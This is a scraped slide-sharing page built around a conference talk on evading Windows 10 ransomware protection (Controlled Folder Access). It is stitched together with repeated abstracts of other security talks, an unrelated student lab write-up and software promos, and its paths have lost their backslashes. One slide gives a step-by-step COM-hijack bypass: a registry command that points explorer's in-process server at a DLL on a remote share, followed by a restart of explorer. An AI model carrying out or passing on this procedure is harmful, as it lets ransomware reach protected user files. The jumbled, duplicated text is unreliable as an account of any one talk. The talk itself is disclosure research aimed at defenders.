The WannaCry cyber-attack all over the world in May, 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a measure against ransomware, Microsoft introduced the function "Ransomware protection" in "Windows 10 Fall Creators Update". How does this function work? Is it really effective? In this talk, I will explain the operation principles of "Controlled folder access" of"Ransomware protection" through demonstration video. Then I show the requirements to avoid this function, and describe that this function can be avoided very easily. And I will ask you that we may have to reconsider the definition of vulnerability.
Roy Levin, Microsoft
Mathias Scherman, Microsoft
Yotam Livny, Microsoft
As a Cloud Security provider, Azure Security Center collect logs from various services, that contain potentially vast security information. However, parsing them to extracting the most information is a hard task.
Artificial Intelligence techniques prove to perform well for such pattern recognition tasks. In this talk, we will present a novel approach leveraging recent advances in Deep Learning to detect malicious IaaS VMs being compromised, using Windows Security Events.
Monthly DFIR Training in collaboration with DFIR Austin. This month's training covered the process of getting remote access during incident response investigations, delving into rapid agent deployment options such as GPOs and RMM tools as well as agentless triage channels such as WMI, Powershell Remoting, SSH, etc.
There is increased discussion around threats that adopt so-called “living off the land” tactics. Attackers are increasingly making use of tools already installed on targeted computers or are running simple scripts and shellcode directly in memory. Creating fewer new files on the hard disk, or being completely fileless, means less chance of being detected by traditional security tools and therefore minimizes the risk of an attack being blocked. Using simple and clean dual-use tools allows the attacker to hide in plain sight among legitimate system administration work.
Further reading:
Attackers are increasingly living off the land (https://www.symantec.com/connect/blogs/attackers-are-increasingly-living-land)
Living off the land and fileless attack techniques (https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf)
Jagadeesh Parameswaran, Microsoft
Rahul Sachan, Microsoft
Windows Defender Advanced Threat Protection (WDATP) gives defenders unparalleled visibility into the enterprise. And Azure Advanced Threat Protection (AATP) gives the power to monitor attacks on the Domain Controllers and user identities. Come spend an hour with us as we pull back the covers and go through detailed examples of real attacks that we saw as we defended the Microsoft corporate environment using WDATP & AATP.
Dana Baril, Microsoft
Credential theft is an important part of the attacker playbook when attempting lateral movement. This process mostly involves dumping credentials saved locally on the machine. In many cases these passwords can be retrieved from the Windows Credential Manager, allowing attackers an easy path into the organization. This was evident in major attacks such as the NotPetya ransomware, and high-profile tools like Mimikatz.
In this talk, we explain how to detect credential theft out of the Windows Credential Manager using Windows Defender Advanced Threat Protection (WDATP). This involves modifying the Windows operating system to send telemetry to the WDATP cloud which was extended with new detection rules.
Roy Levin, Microsoft
Mathias Scherman, Microsoft
Yotam Livny, Microsoft
As a Cloud Security provider, Azure Security Center collect logs from various services, that contain potentially vast security information. However, parsing them to extracting the most information is a hard task.
Artificial Intelligence techniques prove to perform well for such pattern recognition tasks. In this talk, we will present a novel approach leveraging recent advances in Deep Learning to detect malicious IaaS VMs being compromised, using Windows Security Events.
Monthly DFIR Training in collaboration with DFIR Austin. This month's training covered the process of getting remote access during incident response investigations, delving into rapid agent deployment options such as GPOs and RMM tools as well as agentless triage channels such as WMI, Powershell Remoting, SSH, etc.
There is increased discussion around threats that adopt so-called “living off the land” tactics. Attackers are increasingly making use of tools already installed on targeted computers or are running simple scripts and shellcode directly in memory. Creating fewer new files on the hard disk, or being completely fileless, means less chance of being detected by traditional security tools and therefore minimizes the risk of an attack being blocked. Using simple and clean dual-use tools allows the attacker to hide in plain sight among legitimate system administration work.
Further reading:
Attackers are increasingly living off the land (https://www.symantec.com/connect/blogs/attackers-are-increasingly-living-land)
Living off the land and fileless attack techniques (https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf)
Jagadeesh Parameswaran, Microsoft
Rahul Sachan, Microsoft
Windows Defender Advanced Threat Protection (WDATP) gives defenders unparalleled visibility into the enterprise. And Azure Advanced Threat Protection (AATP) gives the power to monitor attacks on the Domain Controllers and user identities. Come spend an hour with us as we pull back the covers and go through detailed examples of real attacks that we saw as we defended the Microsoft corporate environment using WDATP & AATP.
Dana Baril, Microsoft
Credential theft is an important part of the attacker playbook when attempting lateral movement. This process mostly involves dumping credentials saved locally on the machine. In many cases these passwords can be retrieved from the Windows Credential Manager, allowing attackers an easy path into the organization. This was evident in major attacks such as the NotPetya ransomware, and high-profile tools like Mimikatz.
In this talk, we explain how to detect credential theft out of the Windows Credential Manager using Windows Defender Advanced Threat Protection (WDATP). This involves modifying the Windows operating system to send telemetry to the WDATP cloud which was extended with new detection rules.
Threat actors are increasing their use of fleless
malware for one simple reason: most organizations
aren't prepared to detect it. Education is the frst step in
determining what threat these new attacks pose and what
you can do to detect and stop fileless malware attacks. Learn more at: https://www.bluvector.io
International collaborative efforts to share threat data in a vetted member c...CODE BLUE
The APWG has been sharing threat data for over 12 years to help protect organizations and the all internet users against cyber threats. Initially founded to focus on the phishing, as the threat landscape on the internet has grown so has APWG. Today our vetted member community shares information to fight cybercrime and fraud not only on phishing but numerous other types of threat data including malicious IP addresses and ransomware information. This session will look at the history of sharing these types of data, how sharing has changed over the years and the necessity to automate these process.
What you need to know about ExPetr ransomwareKaspersky
On Thursday, 29 June, Kaspersky Lab teamed up with Comae Technologies to present an emergency webinar for businesses to help them understand and defend against the Petya/ExPetr ransomware. The malware has affected companies in a range of industry sectors across the world, with Ukraine, Russia and number of Western European countries most affected.
Juan Andres Guerrero-Saade, senior security researcher in Kaspersky Lab’s Global Research and Analysis Team, will be joined by Matt Suiche from Comae Technologies to present the very latest information on the ransomware’s attack vectors, the infection process and how it spreads through company networks. They will provide mitigation guidance and explain the actions organizations need to take to secure their computers and networks against this threat.
More technical details regarding this threat: https://kas.pr/cf6w
Advice on how to protect your files: https://kas.pr/s8dp
https://kas.pr/2nvh
https://kas.pr/yg72
And how to you can protect yourself with our free tool: https://go.kaspersky.com/Anti-ransomware-tool_soc.html?utm_source=smm_yt&utm_medium=ww_yt_o_0516
Oran Brill, Microsoft
Tomer Teller, Microsoft
How often did you find yourself analyzing a security alert only to find out you had already hunted similar alerts in the past? This Déjà vu happens quite often to cybersecurity analysts who work in a SOC. What if we told you that most security alerts can be assigned with a confidence score automatically, letting you, the analyst, focus on the most serious alerts? In this talk, we will present tools and techniques to automate human cybersecurity analyst by leveraging knowledge of past incidents, current security posture and a dash of crowdsourcing. Under the hood, we generate a ”tailor-made” hunting graph based on diverse data sources and security know-how which enables us to extract meaningful insights. By applying custom logic, aggregations and data science we will illustrate how to uncover patterns within the insights and assign a confidence score with appropriate reasoning to the alert, automatically.
Humla workshop on Android Security Testing by Sai Sathya narayan Venkatraman, MWR Infosecurity
This workshop gives you hands on experience in identifying and exploiting the latest categories of vulnerabilities against modern Android applications based on real world examples. You’ll use the latest testing tools to assess, unravel and exploit applications, and learn about vulnerability classes unique to Android.
You will learn:-
-To analyze applications from an attacker’s perspective.
- Basic understanding of the latest attack vectors against Android applications
- To perform black box security assessments against real world applications using the latest and widely used tools
more info here http://www.meetup.com/Null-Singapore-The-Open-Security-Community/events/229931768/
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAlienVault
During this technical one-hour session, Santiago Gonzalez, an OSSEC core team member (System integration, rules & SIEM) and AlienVault Director of Professional Services, will demonstrate how to integrate OSSEC with other 3rd party applications for greater security visibility and response.
To learn more, check out the video: https://www.alienvault.com/resource-center/webcasts/advanced-ossec-training-integration-strategies-for-open-source-security
Best Practices for Configuring Your OSSIM InstallationAlienVault
Because every network environment is different, OSSIM offers flexibile configuration options to adapt to the needs of different environments. Whether you are just getting started with OSSIM, or have been using it for years, thinking through the configuration options availble will help you get the most out of your installation.
Join us for this customer training webcast where our OSSIM experts will walk through:
How to deploy & configure OSSEC agents
Best practices for configuring syslog and enabling plugins
Scanning your network for assets and vulnerabilities
PIDS research slides from MALCON 2018 conference - Asaf HechtAsaf Hecht
Research presentation of: Analysis and Detection of Network Printer Attacks.
Presented by Asaf Hecht at "the 13th International Conference on Malicious and Unwanted Software" (MALCON 2018) in Nantucket, USA.
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10Soya Aoyama
The WannaCry cyber-attack all over the world in May, 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a measure against ransomware, Microsoft introduced the function "Ransomware protection" in "Windows 10 Fall Creators Update". How does this function work? Is it really effective? In this talk, I will explain the operation principles of "Controlled folder access" of "Ransomware protection" through demonstration video. Then I show the requirements to avoid this function, and describe that this function can be avoided very easily. And I will ask you that we may have to reconsider the definition of vulnerability.
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...Alexander Benoit
AppLocker, Windows Information Protection, Device Guard, Windows Defender Application Guard- there are many ways to secure Windows 10. Not all ways are compatible with Enterprise requirements. In the session, we will have a look at what we are able to do and I will add some experiences from the field about what works well and what doesn’t. In addition, we will check how ConfigMgr can support us.
Threat actors are increasing their use of fleless
malware for one simple reason: most organizations
aren't prepared to detect it. Education is the frst step in
determining what threat these new attacks pose and what
you can do to detect and stop fileless malware attacks. Learn more at: https://www.bluvector.io
International collaborative efforts to share threat data in a vetted member c...CODE BLUE
The APWG has been sharing threat data for over 12 years to help protect organizations and the all internet users against cyber threats. Initially founded to focus on the phishing, as the threat landscape on the internet has grown so has APWG. Today our vetted member community shares information to fight cybercrime and fraud not only on phishing but numerous other types of threat data including malicious IP addresses and ransomware information. This session will look at the history of sharing these types of data, how sharing has changed over the years and the necessity to automate these process.
What you need to know about ExPetr ransomwareKaspersky
On Thursday, 29 June, Kaspersky Lab teamed up with Comae Technologies to present an emergency webinar for businesses to help them understand and defend against the Petya/ExPetr ransomware. The malware has affected companies in a range of industry sectors across the world, with Ukraine, Russia and number of Western European countries most affected.
Juan Andres Guerrero-Saade, senior security researcher in Kaspersky Lab’s Global Research and Analysis Team, will be joined by Matt Suiche from Comae Technologies to present the very latest information on the ransomware’s attack vectors, the infection process and how it spreads through company networks. They will provide mitigation guidance and explain the actions organizations need to take to secure their computers and networks against this threat.
More technical details regarding this threat: https://kas.pr/cf6w
Advice on how to protect your files: https://kas.pr/s8dp
https://kas.pr/2nvh
https://kas.pr/yg72
And how to you can protect yourself with our free tool: https://go.kaspersky.com/Anti-ransomware-tool_soc.html?utm_source=smm_yt&utm_medium=ww_yt_o_0516
Oran Brill, Microsoft
Tomer Teller, Microsoft
How often did you find yourself analyzing a security alert only to find out you had already hunted similar alerts in the past? This Déjà vu happens quite often to cybersecurity analysts who work in a SOC. What if we told you that most security alerts can be assigned with a confidence score automatically, letting you, the analyst, focus on the most serious alerts? In this talk, we will present tools and techniques to automate human cybersecurity analyst by leveraging knowledge of past incidents, current security posture and a dash of crowdsourcing. Under the hood, we generate a ”tailor-made” hunting graph based on diverse data sources and security know-how which enables us to extract meaningful insights. By applying custom logic, aggregations and data science we will illustrate how to uncover patterns within the insights and assign a confidence score with appropriate reasoning to the alert, automatically.
Humla workshop on Android Security Testing by Sai Sathya narayan Venkatraman, MWR Infosecurity
This workshop gives you hands on experience in identifying and exploiting the latest categories of vulnerabilities against modern Android applications based on real world examples. You’ll use the latest testing tools to assess, unravel and exploit applications, and learn about vulnerability classes unique to Android.
You will learn:-
-To analyze applications from an attacker’s perspective.
- Basic understanding of the latest attack vectors against Android applications
- To perform black box security assessments against real world applications using the latest and widely used tools
more info here http://www.meetup.com/Null-Singapore-The-Open-Security-Community/events/229931768/
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAlienVault
During this technical one-hour session, Santiago Gonzalez, an OSSEC core team member (System integration, rules & SIEM) and AlienVault Director of Professional Services, will demonstrate how to integrate OSSEC with other 3rd party applications for greater security visibility and response.
To learn more, check out the video: https://www.alienvault.com/resource-center/webcasts/advanced-ossec-training-integration-strategies-for-open-source-security
Best Practices for Configuring Your OSSIM InstallationAlienVault
Because every network environment is different, OSSIM offers flexibile configuration options to adapt to the needs of different environments. Whether you are just getting started with OSSIM, or have been using it for years, thinking through the configuration options availble will help you get the most out of your installation.
Join us for this customer training webcast where our OSSIM experts will walk through:
How to deploy & configure OSSEC agents
Best practices for configuring syslog and enabling plugins
Scanning your network for assets and vulnerabilities
PIDS research slides from MALCON 2018 conference - Asaf HechtAsaf Hecht
Research presentation of: Analysis and Detection of Network Printer Attacks.
Presented by Asaf Hecht at "the 13th International Conference on Malicious and Unwanted Software" (MALCON 2018) in Nantucket, USA.
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10Soya Aoyama
The WannaCry cyber-attack all over the world in May, 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a measure against ransomware, Microsoft introduced the function "Ransomware protection" in "Windows 10 Fall Creators Update". How does this function work? Is it really effective? In this talk, I will explain the operation principles of "Controlled folder access" of "Ransomware protection" through demonstration video. Then I show the requirements to avoid this function, and describe that this function can be avoided very easily. And I will ask you that we may have to reconsider the definition of vulnerability.
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...Alexander Benoit
AppLocker, Windows Information Protection, Device Guard, Windows Defender Application Guard- there are many ways to secure Windows 10. Not all ways are compatible with Enterprise requirements. In the session, we will have a look at what we are able to do and I will add some experiences from the field about what works well and what doesn’t. In addition, we will check how ConfigMgr can support us.
Cybercrime is a business just like any other. And in business, there are budgets to stick to, and bosses to report to. Therefore, most cyber criminals are after easy money. They want quick wins with minimal effort – just because they can! Mass production is the key to profitability, even in the malware business.
Learn more about the specific actions you can and should take to secure your workstations in the webinar recording in the following link and the presentation slides here.
https://business.f-secure.com/defending-workstations-recording-from-cyber-security-webinar-2/
Join us this month as we recap the Microsoft and 3rd Party security patches released on Patch Tuesday. We will discuss things to watch out for, products to be sure to test adequately, and which patches should be highest priority to roll out.
Best practices to secure Windows10 with already included featuresAlexander Benoit
AppLocker, Windows Information Protection, Device Guard, WDAG - there are many ways to secure Windows 10. Not all ways are compatible with enterprise requirements. In the session, we look at what we are able to do and discuss experiences from the field around what works well and what doesn’t. In addition, we check how Configuration Manager can support us.
https://youtu.be/zqUwgLDmCqY
Reducing attack surface on ICS with Windows native solutionsJan Seidl
Presentation given at 4SICS conference in Stockholm, Sweden about using Windows built-in solutions like Software Restriciton Policies/App Locker, EMET and other minor things.
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docxeugeniadean34240
1RUNNING HEAD: MANAGING HOST BASED SECURITY IN WINDOWS 8.1
Lab Deliverable for Lab 2
a. Procedure to Manage Windows Defender
Operating Environment:
1. Operating System: Windows 8.1 Pro
2. Hardware: A Laptop
3. Software: VMware Horizon Client Installed
Description:
This window configuration project will require the sytem admin permission so as to access the programs and get to know how it is commanded to the action it should peform. Also, to use a virtual box one should have knowledge in how to operate the virtual box and explore the virtual programs
Notes, Warnings and Restrictions:
1. Windows Defender come with windows 8.1 software and are found in the control panel.
2. The application is used only when you login your system as an administarator or have permitted to act as the administrator.
3. For windows defender to run in the system it should be turned on and no other antivirus should be active
4. Scanning the system with windows defender deletes infected files. Also ensure you do the required scanning
5. If a different anti virus has been previously deleted, then windows defender needs to be turned off and to be restarted
Resources (Futher Reading):
Firewalls. (n.d.). Retrieved from https://technet.microsoft.com/en-us/library/cc700820.aspx
Microsoft Baseline Security Analyzer. (2011). Retrieved from https://dougvitale.wordpress.com/2011/11/18/microsoft-baseline-security-analyzer/
CloudFlare. (n.d.). Retrieved from https://www.winhelp.us/configure-windows-defender-in-windows-8.html
Procedures:
Windows defender
Window defender protects a computer system against any form of malware by running in the background of the computer system and gives notification if any suspicious item is found in the syatem for the user to take action. It can also be used by a computer to scan the system if the system has issues e.g becomes slow, switches off when not commanded to, hanging among other things. Windows defender should be updated over time so that it is not outdated and also to improve its performance.
Windows defender is found in the control panel icon, steps of opening are
i. Open control panel and select “windows defender”
ii. While you click on windows defender, the following page appears
a) To update the system click on “update”
b) Real time scanning
c) For the full scan results it will appear in the table as shown below
d) For quick results check the button just before you click on scan. Then the results will appear as shown below.
e) To scan removable device, select “setting” and click on advance
Then check the box just before removing any removable drivers and click save
b. Procedure to configure Windows Firewall for Windows 8.1
Operating Environment:
1. Operating System: Windows 8.1 Pro
2. Hardware: A Laptop
3. Software: VMware Horizon Client Installed
Descriptions:
Windows firewall is a protection application that protects against suspicious items, It helps in blocking suspicious programs .
Ramnit is a worm that spreads through removable drives by infecting files. The worm (W32.Ramnit) was first discovered in early 2010 and later that year, a second variant of Ramnit (W32.Ramnit.B) was identified. Since then, Ramnit’s operators have made considerable upgrades to the threat, including implementing the use of modules, which was borrowed from the leaked source code of the Zeus banking Trojan (Trojan.Zbot) in May 2011.
Currently, Ramnit’s operators are primarily focused on information-stealing tactics, targeting data such as passwords and online banking login credentials. They also install remote access tools on affected computers in order to maintain back door connectivity. It is estimated that the Ramnit botnet may consist of up to 350,000 compromised computers worldwide.
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHackSoya Aoyama
How many sites do you use? Is the password long enough and secure? Do not tell me you reused it.
Unfortunately, we have not a memory good enough to remember so many passwords long and secure.
For this reason, there are several companies providing password management applications. However, are they really secure?
I have executed a man-in-the-middle attack against a certain password management application.
Surprisingly, the password was exchanged in plain text between .exe and .dll, and it was very easy to steal it.
The program I created is generic and, under certain conditions, can steal information between all .exe and .dll in Windows.
In this talk, I will demonstrate the actual attack, and provide technical explanations to enable this attack. And finally, I suggest ways to protect other apps from this attack.
Similar to An inconvenient truth: Evading the Ransomware Protection in windows 10 @ HackMiami (20)
How Recreation Management Software Can Streamline Your Operations.pptxwottaspaceseo
Recreation management software streamlines operations by automating key tasks such as scheduling, registration, and payment processing, reducing manual workload and errors. It provides centralized management of facilities, classes, and events, ensuring efficient resource allocation and facility usage. The software offers user-friendly online portals for easy access to bookings and program information, enhancing customer experience. Real-time reporting and data analytics deliver insights into attendance and preferences, aiding in strategic decision-making. Additionally, effective communication tools keep participants and staff informed with timely updates. Overall, recreation management software enhances efficiency, improves service delivery, and boosts customer satisfaction.
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns
Unlocking Business Potential: Tailored Technology Solutions by Prosigns
Discover how Prosigns, a leading technology solutions provider, partners with businesses to drive innovation and success. Our presentation showcases our comprehensive range of services, including custom software development, web and mobile app development, AI & ML solutions, blockchain integration, DevOps services, and Microsoft Dynamics 365 support.
Custom Software Development: Prosigns specializes in creating bespoke software solutions that cater to your unique business needs. Our team of experts works closely with you to understand your requirements and deliver tailor-made software that enhances efficiency and drives growth.
Web and Mobile App Development: From responsive websites to intuitive mobile applications, Prosigns develops cutting-edge solutions that engage users and deliver seamless experiences across devices.
AI & ML Solutions: Harnessing the power of Artificial Intelligence and Machine Learning, Prosigns provides smart solutions that automate processes, provide valuable insights, and drive informed decision-making.
Blockchain Integration: Prosigns offers comprehensive blockchain solutions, including development, integration, and consulting services, enabling businesses to leverage blockchain technology for enhanced security, transparency, and efficiency.
DevOps Services: Prosigns' DevOps services streamline development and operations processes, ensuring faster and more reliable software delivery through automation and continuous integration.
Microsoft Dynamics 365 Support: Prosigns provides comprehensive support and maintenance services for Microsoft Dynamics 365, ensuring your system is always up-to-date, secure, and running smoothly.
Learn how our collaborative approach and dedication to excellence help businesses achieve their goals and stay ahead in today's digital landscape. From concept to deployment, Prosigns is your trusted partner for transforming ideas into reality and unlocking the full potential of your business.
Join us on a journey of innovation and growth. Let's partner for success with Prosigns.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Utilocate offers a comprehensive solution for locate ticket management by automating and streamlining the entire process. By integrating with Geospatial Information Systems (GIS), it provides accurate mapping and visualization of utility locations, enhancing decision-making and reducing the risk of errors. The system's advanced data analytics tools help identify trends, predict potential issues, and optimize resource allocation, making the locate ticket management process smarter and more efficient. Additionally, automated ticket management ensures consistency and reduces human error, while real-time notifications keep all relevant personnel informed and ready to respond promptly.
The system's ability to streamline workflows and automate ticket routing significantly reduces the time taken to process each ticket, making the process faster and more efficient. Mobile access allows field technicians to update ticket information on the go, ensuring that the latest information is always available and accelerating the locate process. Overall, Utilocate not only enhances the efficiency and accuracy of locate ticket management but also improves safety by minimizing the risk of utility damage through precise and timely locates.
Enhancing Research Orchestration Capabilities at ORNL.pdfGlobus
Cross-facility research orchestration comes with ever-changing constraints regarding the availability and suitability of various compute and data resources. In short, a flexible data and processing fabric is needed to enable the dynamic redirection of data and compute tasks throughout the lifecycle of an experiment. In this talk, we illustrate how we easily leveraged Globus services to instrument the ACE research testbed at the Oak Ridge Leadership Computing Facility with flexible data and task orchestration capabilities.
Enterprise Resource Planning System includes various modules that reduce any business's workload. Additionally, it organizes the workflows, which drives towards enhancing productivity. Here are a detailed explanation of the ERP modules. Going through the points will help you understand how the software is changing the work dynamics.
To know more details here: https://blogs.nyggs.com/nyggs/enterprise-resource-planning-erp-system-modules/
Launch Your Streaming Platforms in MinutesRoshan Dwivedi
The claim of launching a streaming platform in minutes might be a bit of an exaggeration, but there are services that can significantly streamline the process. Here's a breakdown:
Pros of Speedy Streaming Platform Launch Services:
No coding required: These services often use drag-and-drop interfaces or pre-built templates, eliminating the need for programming knowledge.
Faster setup: Compared to building from scratch, these platforms can get you up and running much quicker.
All-in-one solutions: Many services offer features like content management systems (CMS), video players, and monetization tools, reducing the need for multiple integrations.
Things to Consider:
Limited customization: These platforms may offer less flexibility in design and functionality compared to custom-built solutions.
Scalability: As your audience grows, you might need to upgrade to a more robust platform or encounter limitations with the "quick launch" option.
Features: Carefully evaluate which features are included and if they meet your specific needs (e.g., live streaming, subscription options).
Examples of Services for Launching Streaming Platforms:
Muvi [muvi com]
Uscreen [usencreen tv]
Alternatives to Consider:
Existing Streaming platforms: Platforms like YouTube or Twitch might be suitable for basic streaming needs, though monetization options might be limited.
Custom Development: While more time-consuming, custom development offers the most control and flexibility for your platform.
Overall, launching a streaming platform in minutes might not be entirely realistic, but these services can significantly speed up the process compared to building from scratch. Carefully consider your needs and budget when choosing the best option for you.
Top 7 Unique WhatsApp API Benefits | Saudi ArabiaYara Milbes
Discover the transformative power of the WhatsApp API in our latest SlideShare presentation, "Top 7 Unique WhatsApp API Benefits." In today's fast-paced digital era, effective communication is crucial for both personal and professional success. Whether you're a small business looking to enhance customer interactions or an individual seeking seamless communication with loved ones, the WhatsApp API offers robust capabilities that can significantly elevate your experience.
In this presentation, we delve into the top 7 distinctive benefits of the WhatsApp API, provided by the leading WhatsApp API service provider in Saudi Arabia. Learn how to streamline customer support, automate notifications, leverage rich media messaging, run scalable marketing campaigns, integrate secure payments, synchronize with CRM systems, and ensure enhanced security and privacy.
Large Language Models and the End of ProgrammingMatt Welsh
Talk by Matt Welsh at Craft Conference 2024 on the impact that Large Language Models will have on the future of software development. In this talk, I discuss the ways in which LLMs will impact the software industry, from replacing human software developers with AI, to replacing conventional software with models that perform reasoning, computation, and problem-solving.
In software engineering, the right architecture is essential for robust, scalable platforms. Wix has undergone a pivotal shift from event sourcing to a CRUD-based model for its microservices. This talk will chart the course of this pivotal journey.
Event sourcing, which records state changes as immutable events, provided robust auditing and "time travel" debugging for Wix Stores' microservices. Despite its benefits, the complexity it introduced in state management slowed development. Wix responded by adopting a simpler, unified CRUD model. This talk will explore the challenges of event sourcing and the advantages of Wix's new "CRUD on steroids" approach, which streamlines API integration and domain event management while preserving data integrity and system resilience.
Participants will gain valuable insights into Wix's strategies for ensuring atomicity in database updates and event production, as well as caching, materialization, and performance optimization techniques within a distributed system.
Join us to discover how Wix has mastered the art of balancing simplicity and extensibility, and learn how the re-adoption of the modest CRUD has turbocharged their development velocity, resilience, and scalability in a high-growth environment.
GraphSummit Paris - The art of the possible with Graph TechnologyNeo4j
Sudhir Hasbe, Chief Product Officer, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...Juraj Vysvader
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I didn't get rich from it but it did have 63K downloads (powered possible tens of thousands of websites).
Listen to the keynote address and hear about the latest developments from Rachana Ananthakrishnan and Ian Foster who review the updates to the Globus Platform and Service, and the relevance of Globus to the scientific community as an automation platform to accelerate scientific discovery.
Understanding Globus Data Transfers with NetSageGlobus
NetSage is an open privacy-aware network measurement, analysis, and visualization service designed to help end-users visualize and reason about large data transfers. NetSage traditionally has used a combination of passive measurements, including SNMP and flow data, as well as active measurements, mainly perfSONAR, to provide longitudinal network performance data visualization. It has been deployed by dozens of networks world wide, and is supported domestically by the Engagement and Performance Operations Center (EPOC), NSF #2328479. We have recently expanded the NetSage data sources to include logs for Globus data transfers, following the same privacy-preserving approach as for Flow data. Using the logs for the Texas Advanced Computing Center (TACC) as an example, this talk will walk through several different example use cases that NetSage can answer, including: Who is using Globus to share data with my institution, and what kind of performance are they able to achieve? How many transfers has Globus supported for us? Which sites are we sharing the most data with, and how is that changing over time? How is my site using Globus to move data internally, and what kind of performance do we see for those transfers? What percentage of data transfers at my institution used Globus, and how did the overall data transfer performance compare to the Globus users?
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Mind IT Systems
Healthcare providers often struggle with the complexities of chronic conditions and remote patient monitoring, as each patient requires personalized care and ongoing monitoring. Off-the-shelf solutions may not meet these diverse needs, leading to inefficiencies and gaps in care. It’s here, custom healthcare software offers a tailored solution, ensuring improved care and effectiveness.
We describe the deployment and use of Globus Compute for remote computation. This content is aimed at researchers who wish to compute on remote resources using a unified programming interface, as well as system administrators who will deploy and operate Globus Compute services on their research computing infrastructure.
7. TANMAY GANACHARYA
Principal Group Manager, Windows Defender Research
Ransomware protection on Windows 10
For end users, the dreaded ransom
note announces that ransomware has
already taken their files hostage:
documents, precious photos and
videos, and other important files
encrypted. On Windows 10 Fall
Creators Update, a new feature helps
stop ransomware from accessing
important files in real-time, even if it
manages to infect the computer. When
enabled, Controlled folder access locks
down folders, allowing only authorized
apps to access files.
https://www.microsoft.com/security/blog/2017/10/23/
stopping-ransomware-where-it-counts-protecting-
your-data-with-controlled-folder-access/
20. YAGO JESUS
MICROSOFT ANTI RANSOMWARE BYPASS
By default, Office executables are included in the whitelist so these programs
could make changes in protected folders without restrictions.
This access level is granted even if a malicious user uses OLE/COM objects to
drive Office executables programmatically.
So a Ransomware developer could adapt their software to use OLE objects to
change / delete / encrypt files invisibly for the files owner
http://www.securitybydefault.com/2018/01/microsoft-anti-ransomware-bypass-not.html
37. This is revenge
• Step-by-step instructions to reproduce the issue on a fresh install
1. Put the malicious dll on shared file server. (10.0.1.40shareAnti-ControlledFolderAccess.dll)
2. Start the cmd.exe on target PC. (An administrator privilege is NOT required)
3. Execute the following command.
4. Start the procexp.exe on target PC.
reg add HKCUSoftwareClassesCLSID{90AA3A4E-1CBA-4233-B8BB-535773D48449}
InprocServer32 /f /ve /t REG_SZ /d 10.0.1.40tmpAnti-ControlledFolderAccess.dll
taskkill /IM explorer.exe /F
start explorer.exe
39. Microsoft Security Servicing Criteria for Windows
Security boundaries
Security Boundary SecurityGoal
Network boundary An unauthorized network endpoint cannot access or tamper with the code and data on a
customer’s device.
Kernel boundary A non-administrative user mode process cannot access or tamper with kernel code and data.
Administrator-to-kernel is not a security boundary.
Process boundary An unauthorized user mode process cannot access or tamper with the code and data of another
process.
AppContainer
sandbox boundary
An AppContainer-based sandbox process cannot access or tamper with code and data outside
of the sandbox based on the container capabilities
User boundary A user cannot access or tamper with the code and data of another user without being
authorized.
Session boundary A user logon session cannot access or tamper with another user logon session without being
authorized.
Web browser
boundary
An unauthorized website cannot violate the same-origin policy, nor can it access or tamper with
the native code and data of the Microsoft Edge web browser sandbox.
Virtual machine
boundary
An unauthorized Hyper-V guest virtual machine cannot access or tamper with the code and
data of another guest virtual machine; this includes Hyper-V Isolated Containers.
Virtual Secure Mode
boundary
Data and code within a VSM trustlet or enclave cannot be accessed or tampered with by code
executing outside of the VSM trustlet or enclave.
40. NOT covered by active bug bounty programs.
Defense-in-depth security features
Security feature Security Goal
User Account Control (UAC) Prevent unwanted system-wide changes (files, registry, etc) without administrator
consent
AppLocker Prevent unauthorized applications from executing
Controlled Folder Access Protect access and modification to controlled folders from apps that may be malicious
Mark of the Web (MOTW) Prevent active content download from the web from elevating privileges when viewed
locally
Kernel Address Space Layout
Randomization (KASLR)
The layout of the kernel virtual address space is not predictable to an attacker (on 64-
bit)
Control Flow Guard (CFG) CFG protected code can only make indirect calls to valid indirect call targets
Windows Defender Exploit
Guard (WDEG)
Allow apps to enable additional defense-in-depth exploit mitigation features that make
it more difficult to exploit vulnerabilities
Protected Process Light
(PPL)
Prevent non-administrative non-PPL processes from accessing or tampering with code
and data in a PPL process via open process functions
Shielded Virtual Machines Help protect a VM’s secrets and its data against malicious fabric admins or malware
running on the host from both runtime and offline attacks
https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
41. I can
- Escalate privileges to administrator
- Evading the Ransomware Protection
By inject to Explorer
42. I’d like to suggest to Microsoft
-Load only the signed dll
-Implement the ControlledDllLoad
mechanism
Hello everyone.
Today, I’ll give a presentation about… "Evading the Ransomware Protection in Windows 10"
This is an inconvenient truth for Microsoft.
I’ll be happy to answer any questions… at the end of my talk.
⏎
First, let me introduce myself.
I’m Soya Aoyama.
